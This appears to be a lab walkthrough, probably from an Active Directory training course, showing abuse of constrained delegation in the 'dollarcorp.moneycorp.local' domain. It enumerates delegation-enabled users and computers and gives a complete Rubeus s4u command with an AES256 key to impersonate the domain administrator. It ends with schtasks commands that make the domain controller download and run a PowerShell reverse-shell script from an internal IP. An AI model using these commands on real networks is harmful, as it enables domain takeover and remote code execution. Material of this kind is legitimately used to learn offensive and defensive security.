Now let’s enumerate the Users and Computers that have Constrained Delegation

Get-DomainUser -TrustedToAuth

If we compromised the User websvc we can impersonate the Domain Admin for the CIFS services on dcorp-mssql Computer

Get-DomainComputer -TrustedToAuth

Now this looks interesting if we compromised the dcorp-adminsrv Computer we can impersonate the Domain Administrator for the Time Service in the Domain Controller

Now let’s abuse the Constrained Delegation

.\\Rubeus.exe s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:administrator /msdsspn:TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:HOST /nowrap /ptt

Now let’s list the Tickets

klist

Now let’s create a schedule Task on the Domain Controller to get a reverse shell

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''<http://172.16.100.22/Invoke-PowerShellTcp.ps1>''')'"

Now let’s run the Task

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"